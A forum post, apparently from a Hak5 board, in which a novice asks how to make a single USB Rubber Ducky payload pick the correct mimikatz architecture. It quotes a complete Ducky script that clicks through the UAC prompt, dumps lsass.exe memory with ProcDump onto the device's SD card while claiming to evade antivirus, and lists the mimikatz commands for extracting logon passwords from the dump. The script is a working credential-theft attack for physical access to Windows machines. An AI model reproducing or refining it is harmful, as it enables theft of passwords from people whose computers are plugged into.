Jump to content

HELP! Mimkatz x86 and x64 in one payload


Applenuts
 Share

Recommended Posts

Please someone help?? I am a complete n00b to this stuff, but diving in head first, fast~n~hard. I have successfully compiled and used DK's mimkatz\ProcDump payload. My issue lies in the fact that I have to switch the mimkatz.exe between x86 and x64 manually, depending on the OS. Which implies my inspecting said machine first, then pluging in, swaping files, and so on. Or having seperate .bins (SHIFT+payload button or CTRL+payload button, ect.). Is there a way to have one payload using either .exe version from the root dir? If so, could someone please help a n00b out? THaNX iN AdVAnCE

*****************************************************************************************************************************************************************************

REM Author: Hak5Darren with the help of:
REM @gentilkiwi, @Mubix, redmeatuk, shutin, DyFukA, Microsoft, Sysinternals
REM
REM
Description: "Backup" Windows Passwords without setting off AntiVirus
REM Dumps memory of lsass.exe using Microsoft Sysinternals util ProcDump
REM Passwords can be later be extracted using mimikatz.
REM
REM
Firmware: Use c_duck_v2.1.hex firmware (Twin Duck) to execute from SD
REM card labeled
"DUCKY" and save log file as %COMPUTERNAME%_lsass.dmp
REM
Include procdump.exe on root of DUCKY SD card. Download ProcDump from:
REM http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
REM
REM
Target: Windows Vista/7/8, Win32/x64

REM
*** UAC Bypass ***
DELAY 2000
WINDOWS r
DELAY
200
STRING powershell Start-Process cmd.exe -Verb runAs
ENTER
DELAY
2000
ALT y
DELAY
500

REM *** Define DUCKY drive as %duck%
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY
500

REM *** Execute procdump from SD card and save log file to disk ***
STRING %duck%\procdump.exe -accepteula -ma lsass.exe %duck%\%COMPUTERNAME%_lsass.dmp
ENTER

REM
*** GTFO ***
STRING exit
ENTER

REM
*** Post Exploitation ***
REM From your PC copy the %COMPUTERNAME%_lsass.dmp off the DUCKY SD card to a
REM directory including the version of mimikatz
for your targets architecture
REM
(NT5 win32, NT5 x64, NT6 win32 or NT6 x64) and run the following commands
REM mimikatz
.exe <enter>
REM sekurlsa::minidump %COMPUTERNAME%_lsass.dmp <enter>
REM sekurlsa::logonPasswords full <enter>

*****************************************************************************************************************************************************************************

Link to comment
Share on other sites

  • 2 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...